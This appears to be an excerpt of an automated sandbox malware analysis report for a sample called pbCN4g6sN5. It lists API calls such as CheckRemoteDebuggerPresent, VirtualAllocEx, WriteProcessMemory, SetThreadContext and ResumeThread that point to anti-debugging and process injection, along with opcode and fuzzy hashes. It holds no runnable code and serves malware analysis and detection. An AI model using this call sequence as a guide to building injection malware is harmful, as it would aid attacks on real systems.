                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3662101638-0
                                                                                                                                                                • Opcode ID: 934a41a5bc86a8b78cf669b2e6737a766765d71c51976e30a9ec2dd54f7a1ba8
                                                                                                                                                                • Instruction ID: 38217bc749ff8814eeafd56f1335b398f38017e737b2b51fc5f6b670fc3a5ae5
                                                                                                                                                                • Opcode Fuzzy Hash: 934a41a5bc86a8b78cf669b2e6737a766765d71c51976e30a9ec2dd54f7a1ba8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1522 587aa0a-587aaa7 GetCurrentProcess 1527 587aab0-587aae4 GetCurrentThread 1522->1527 1528 587aaa9-587aaaf 1522->1528 1529 587aae6-587aaec 1527->1529 1530 587aaed-587ab21 GetCurrentProcess 1527->1530 1528->1527 1529->1530 1531 587ab23-587ab29 1530->1531 1532 587ab2a-587ab45 call 587abe8 1530->1532 1531->1532 1536 587ab4b-587ab7a GetCurrentThreadId 1532->1536 1537 587ab83-587abe5 1536->1537 1538 587ab7c-587ab82 1536->1538 1538->1537
APIs
• GetCurrentProcess.KERNEL32 ref: 0587AA96
• GetCurrentThread.KERNEL32 ref: 0587AAD3
• GetCurrentProcess.KERNEL32 ref: 0587AB10
• GetCurrentThreadId.KERNEL32 ref: 0587AB69
Memory Dump Source
• Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
                                                                                                                                                                • Opcode ID: f2c27cc964c296b41da1863111daf0250ec4892efa3802bda7478d6261ae2c73
                                                                                                                                                                • Instruction ID: 779c5f9272d26536f9d88f1bda81994baf5e7871c78df1f192fde923e0462c7a
                                                                                                                                                                • Opcode Fuzzy Hash: f2c27cc964c296b41da1863111daf0250ec4892efa3802bda7478d6261ae2c73
                                                                                                                                                                • Instruction Fuzzy Hash: 155167B09002498FDB44DFAAD548BDEBBF1EF88314F208059E449A72A0D735A984CF65

Control-flow Graph

Control-flow graph of function 587aa18-587abe5 (graph rendering omitted): basic blocks call GetCurrentProcess, GetCurrentThread, GetCurrentProcess again, an internal routine at 587abe8, and finally GetCurrentThreadId.
APIs
• GetCurrentProcess.KERNEL32 ref: 0587AA96
• GetCurrentThread.KERNEL32 ref: 0587AAD3
• GetCurrentProcess.KERNEL32 ref: 0587AB10
• GetCurrentThreadId.KERNEL32 ref: 0587AB69
Memory Dump Source
• Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 6d421e1359b23444a85e0f2cb416212ab149bcfdd62d27429e40270b49701836
• Instruction ID: d7f20460930c325fe7cc00847b13eebb7b3ef0a7cd4e7004a24313f21234c88c
• Opcode Fuzzy Hash: 6d421e1359b23444a85e0f2cb416212ab149bcfdd62d27429e40270b49701836
• Instruction Fuzzy Hash: 5C5146B09006098FEB54DFAAD548BDEBBF1EF88314F20C459E409A72A0D735A984CF65
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: (mq$(mq$(mq
• API String ID: 0-2000372054
• Opcode ID: 305a3e3335e48b0d9e2ab296bacb2d946663f515b1ab135468b52fb861d0d98a
• Instruction ID: 3d2b1da82f961a45c24d74cc9dfa47b8086afba02804d758e79e7e11ca31a252
• Opcode Fuzzy Hash: 305a3e3335e48b0d9e2ab296bacb2d946663f515b1ab135468b52fb861d0d98a
• Instruction Fuzzy Hash: 72A1ACB0A00319DFDB14DFA9C44479DBBF1FF89310F2485AAE409AB391DB70A985CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: Hmq$Hmq
• API String ID: 0-2783791011
• Opcode ID: 4c7c2190bdd5f6ba85745aaff28a5f4a4aa234727892c843dd35f0191035dabb
• Instruction ID: c7f3628c2ae6e53120ad1670b1427e9d5af713c623021b197d0d334a51db9664
• Opcode Fuzzy Hash: 4c7c2190bdd5f6ba85745aaff28a5f4a4aa234727892c843dd35f0191035dabb
• Instruction Fuzzy Hash: 44D10270B142189BCB09FBB8D95956E7BFAEFCA200F44496AD446E7398DF389C05C361
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: TJnq$Teiq
• API String ID: 0-3339893395
• Opcode ID: e025e3c745bca69b83d8742ecb84c547ac8dc497ad736b118dfbc65fa73dd3fc
• Instruction ID: f24ebe23ad0885418cd052b53b53a976c5e78b5cbfc5fdd0b994b3a082384146
• Opcode Fuzzy Hash: e025e3c745bca69b83d8742ecb84c547ac8dc497ad736b118dfbc65fa73dd3fc
• Instruction Fuzzy Hash: 8E11C6713082514FC7066B38996496E3BE6AFC7210B1940DAE506CF3A7CE248C06C7A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: TJnq$Teiq
• API String ID: 0-3339893395
• Opcode ID: 4c3550c0c99dde27c1b8821f4385bccbbcd0d0ceb7adff16f2dcaa5e7b85f6d6
• Instruction ID: 05e8767b725e3e38df7c1db6d6b8263b5f96b41545620414a81e0d002a82dc48
• Opcode Fuzzy Hash: 4c3550c0c99dde27c1b8821f4385bccbbcd0d0ceb7adff16f2dcaa5e7b85f6d6
• Instruction Fuzzy Hash: 23F062323000115FCA44A77DA55897E76EBAFC9620715405DF50ACB3A5CE65DC064795
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: hq
• API String ID: 0-1847014553
• Opcode ID: c7950adc31ca87bdbaec8c8f2ae106175f338d7ca5f8b5cdb94c9c57fd061df9
• Instruction ID: 47527aba5c78a62b9e9706a97025f3ceafe284a2e902e92742345ce6560336a0
• Opcode Fuzzy Hash: c7950adc31ca87bdbaec8c8f2ae106175f338d7ca5f8b5cdb94c9c57fd061df9
• Instruction Fuzzy Hash: A3E1C170B152048FCB04FBB8D69966E7BF6EB89210F804579D446E73A8DF38AD05C761
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: Teiq
• API String ID: 0-3087720294
• Opcode ID: 755358af725a8ebdfd0de77bf3943fbc2f92d7d6a85896408c5954d4da1673c1
• Instruction ID: cfda98edee6475319a1c8bdd0b160ceebba6af5c787a95665f5eb558f4b541f7
• Opcode Fuzzy Hash: 755358af725a8ebdfd0de77bf3943fbc2f92d7d6a85896408c5954d4da1673c1
• Instruction Fuzzy Hash: 35124E74B242048FCB04FFB9D69966E7BB6FB88200FA0453DE445A7369DE38AD05CB51
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: Teiq
• API String ID: 0-3087720294
• Opcode ID: bfe86b84dfb4cb54b8d94f58397e804de08cc052d63ff7beb09be91978158053
• Instruction ID: ac2d741be1f59b82adb8b25a271b8bf2b65f41a38c3b430dedfe789875860ded
• Opcode Fuzzy Hash: bfe86b84dfb4cb54b8d94f58397e804de08cc052d63ff7beb09be91978158053
• Instruction Fuzzy Hash: 98024D74B242048FCB04FFB9D69966E7BB6FB88200FA04539E445A7369DE38AD05CB51
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 058785DE
Memory Dump Source
• Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 98ff89a1feccf93c6cb2666e0952ed344eed230de960ededaebfea22e30c24d5
• Instruction ID: 19d0093d21d2bf7c417d4fccb615508c48c7953cd177ca136e16dea9663a978f
• Opcode Fuzzy Hash: 98ff89a1feccf93c6cb2666e0952ed344eed230de960ededaebfea22e30c24d5
• Instruction Fuzzy Hash: 47812570A00B098FD724DF29D448B5ABBF2FF88304F108929D88AD7A50D775E94ACF91
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 06D09E30
Memory Dump Source
• Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 15afad2fee2574000312d5eaf7c3e961f266768e463bd6a5d94ba7b1b7b5c65c
• Instruction ID: 23f055ac2af1e2da0231e30f0aedb7743dbe3fb58900d9e2df4f4abd919cf15d
• Opcode Fuzzy Hash: 15afad2fee2574000312d5eaf7c3e961f266768e463bd6a5d94ba7b1b7b5c65c
• Instruction Fuzzy Hash: 8C518E7190D3C58FD752CB69C864799BFB0AF07224F1A41DBC495DB2E3D6385809CBA2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0587ED82
Memory Dump Source
• Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 8f0327601843b606b99e4afe5cd72f081d16cc701b303f8e23a51f1367c9d9f4
• Instruction ID: 9d0100e0861c15bee3445373b90bed720fa1b1855bc2e163bb67fd1abc260f7b
                                                                                                                                                                • Opcode Fuzzy Hash: 8f0327601843b606b99e4afe5cd72f081d16cc701b303f8e23a51f1367c9d9f4
                                                                                                                                                                • Instruction Fuzzy Hash: A351BFB1C00209AFDF15CFA9C984ADEBFB6FF48314F15816AE919AB220D7719951CF90
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 583d843afd6610386b307ab45dd7a5a0a2765735986325558213c75a03d84212
                                                                                                                                                                • Instruction ID: e3ea666479caaf54cc034b6e5b03652cb7653e7387cc93bf8d5ff5ee084a9b20
                                                                                                                                                                • Opcode Fuzzy Hash: 583d843afd6610386b307ab45dd7a5a0a2765735986325558213c75a03d84212
                                                                                                                                                                • Instruction Fuzzy Hash: 86318FB790468ACFDB22CF59EA407DEBFE0FB49360F14842AD958A7300C3345655DBA1
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0587ED82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 716092398-0
                                                                                                                                                                • Opcode ID: 3a00c17c98d47c936d3098196b26278957eb958f2c95016e461221b8d14fb0e7
                                                                                                                                                                • Instruction ID: ef6297d28d058f8c97ad03f2180573cfc293e0555f908a12837d4bba91e627f7
                                                                                                                                                                • Opcode Fuzzy Hash: 3a00c17c98d47c936d3098196b26278957eb958f2c95016e461221b8d14fb0e7
                                                                                                                                                                • Instruction Fuzzy Hash: 5741C0B1D10309DFDB14CFA9C884ADEBFB5BF48310F64812AE819AB250D7719945CF90
                                                                                                                                                                APIs
                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05971141
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384829928.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5970000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallProcWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                                                • Opcode ID: f7ae6916488a7e600386c9613b83fa17d422c3bc72dd4ef71e9dabbece0f31a9
                                                                                                                                                                • Instruction ID: 5fbd9e26f8eb545b77f53862f1eb7f8e26773291d9d84c4505f77598bcd5c976
                                                                                                                                                                • Opcode Fuzzy Hash: f7ae6916488a7e600386c9613b83fa17d422c3bc72dd4ef71e9dabbece0f31a9
                                                                                                                                                                • Instruction Fuzzy Hash: F14136B4A00309CFDB14CF89C848AAABBF5FB89314F25C459D519AB321D735A841CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00A1D92F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3662101638-0
                                                                                                                                                                • Opcode ID: e758b6b3fafe922aa13d587d4a535f4345ffbc07e6dc96d0f4e74e70f4a37428
                                                                                                                                                                • Instruction ID: 4c6aabdde798fb99355779da05900897e4ebfc9461da52e4702354d487c7cbd6
                                                                                                                                                                • Opcode Fuzzy Hash: e758b6b3fafe922aa13d587d4a535f4345ffbc07e6dc96d0f4e74e70f4a37428
                                                                                                                                                                • Instruction Fuzzy Hash: 882178B28002198FCB00CF99C4847EEBBF4EF49320F14842AE858B3250D738AA45CF60
                                                                                                                                                                APIs
                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08EAD7F0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                • Opcode ID: b119d13a8b04341f723c6ad5100faef8695e57435e0cfe243961f06cca6af145
                                                                                                                                                                • Instruction ID: 52c5fdac56b6eab0e0c7b41489e903036f3c5380fd44588fb28f8fad933a662d
                                                                                                                                                                • Opcode Fuzzy Hash: b119d13a8b04341f723c6ad5100faef8695e57435e0cfe243961f06cca6af145
                                                                                                                                                                • Instruction Fuzzy Hash: AF2139B69003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7250C778A944CFA4
                                                                                                                                                                APIs
                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0587ACE7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                • Opcode ID: d47ea24d6a4595a1e6bdac724b0f0e516754970a5326fe6309a517bf394388d5
                                                                                                                                                                • Instruction ID: b0cbbef62d224548104fba34a12168baa25d2c20b83c2fcbcf27f6a020a78371
                                                                                                                                                                • Opcode Fuzzy Hash: d47ea24d6a4595a1e6bdac724b0f0e516754970a5326fe6309a517bf394388d5
                                                                                                                                                                • Instruction Fuzzy Hash: A621E4B5900258AFDB10CFAAD984ADEFFF4FB48310F14841AE954A3351C375A944CFA5
                                                                                                                                                                APIs
                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EAE31E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                • Opcode ID: be29bb863b552bc05e5a59acb8b31c8cd597d28747d0d9862719ba3047aa659a
                                                                                                                                                                • Instruction ID: 9e49a1169925351bec1500647a7d6de58cfb1a9fed85ec43992387a6a13db4dc
                                                                                                                                                                • Opcode Fuzzy Hash: be29bb863b552bc05e5a59acb8b31c8cd597d28747d0d9862719ba3047aa659a
                                                                                                                                                                • Instruction Fuzzy Hash: 8B2149719003098FDB10DFAAC4857EEBBF4EF48324F108429D459A7240CB78A944CFA4
                                                                                                                                                                APIs
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 08EACDB6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                • Opcode ID: 208dd0b74eff5f22585ad9b3ecfbbe4d40ac3d8e87c5e8e5ea1a81a2789406c0
                                                                                                                                                                • Instruction ID: fe89cd09c23c328f8f1a61f6a9d35224895ee3ee5f794cc0b0e03e8d4e4b5acc
                                                                                                                                                                • Opcode Fuzzy Hash: 208dd0b74eff5f22585ad9b3ecfbbe4d40ac3d8e87c5e8e5ea1a81a2789406c0
                                                                                                                                                                • Instruction Fuzzy Hash: 812118729003099FDB10DFAAC4857EEBFF4EF88324F54842AD559A7241CB78A944CFA5
                                                                                                                                                                APIs
                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0587ACE7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                • Opcode ID: 2ce3d3e7bb85507f69941cc15312d1df8c47b63c18f300e65350830d44cb4bb0
                                                                                                                                                                • Instruction ID: 6057a9cdbea9e2672cfc16cc874913b52de66b115465f7bcad1d48d7905f7c5b
                                                                                                                                                                • Opcode Fuzzy Hash: 2ce3d3e7bb85507f69941cc15312d1df8c47b63c18f300e65350830d44cb4bb0
                                                                                                                                                                • Instruction Fuzzy Hash: AC21E4B5900208AFDB10CF9AD584ADEFFF4FB48310F14841AE914A3350C375A944CFA4
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 08EAE077
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 08EA3FDB
Memory Dump Source
• Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 06D09E30
Memory Dump Source
• Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
Similarity
• API ID: DeleteFile
• String ID:
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
Memory Dump Source
• Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 00A1DAB0
Memory Dump Source
• Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08EAD48E
Memory Dump Source
• Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID: ResumeThread
• String ID:
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 058785DE
Memory Dump Source
• Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
Similarity
• API ID: HandleModule
• String ID:
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 08EAE9FD
Memory Dump Source
• Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID: MessagePost
• String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: 4'iq
                                                                                                                                                                • Opcode ID: 0d89399855b2d71146ba39f7229ea78ead13e794efdcd67f4df0caf2203e867d
                                                                                                                                                                • Instruction ID: 1f88b80ec482a0a2fcaa9ae192509487cf97c9793a8f332deaf5b56977b8f6b8
                                                                                                                                                                • Opcode Fuzzy Hash: 0d89399855b2d71146ba39f7229ea78ead13e794efdcd67f4df0caf2203e867d
                                                                                                                                                                • Instruction Fuzzy Hash: A871A374B142068FCB08EFB9D559A7E7BB6FB85200F458829D402D7368EB3ADD068B50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (mq
                                                                                                                                                                • API String ID: 0-2407469369
                                                                                                                                                                • Opcode ID: 934c81fbd76420f5a6d3636f5deef5e283407b1f7e945c5c83ecd340a660fe59
                                                                                                                                                                • Instruction ID: 69d05be073ab070a718a789d5de2eb1156df73ae7556f80737d359ebb25b6128
                                                                                                                                                                • Opcode Fuzzy Hash: 934c81fbd76420f5a6d3636f5deef5e283407b1f7e945c5c83ecd340a660fe59
                                                                                                                                                                • Instruction Fuzzy Hash: 82318E71E0025A8FCB00EFB9D8405EEBBB4EF89320F14816AD559E7251EB309956CBA1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 324b9f9cc70967c87ddeb2bf47df8886bde78e6f20de588997bb46123488d286
                                                                                                                                                                • Instruction ID: 7671cee9e9354dd460026e274b421a4ca51a48aab8c67d9b7a36e4626f678450
                                                                                                                                                                • Opcode Fuzzy Hash: 324b9f9cc70967c87ddeb2bf47df8886bde78e6f20de588997bb46123488d286
                                                                                                                                                                • Instruction Fuzzy Hash: AFE1A174B112048FCB04FBB8D699A6E7BF6EB89210F804879D446E7368DF39AD05C761
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e8a1f7edd96afcbef23db76f2ddfbc2ab87797a335f402f0713d69577f8342f4
                                                                                                                                                                • Instruction ID: 72d915e7ed04093570f376b078b0cc5f99bf578867f74eb8b680312cbe5c7eb8
                                                                                                                                                                • Opcode Fuzzy Hash: e8a1f7edd96afcbef23db76f2ddfbc2ab87797a335f402f0713d69577f8342f4
                                                                                                                                                                • Instruction Fuzzy Hash: 25E1B174B152048FC704FBB8D69966E7BF6EB89210F804879D446E7368DF39AC05C761
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
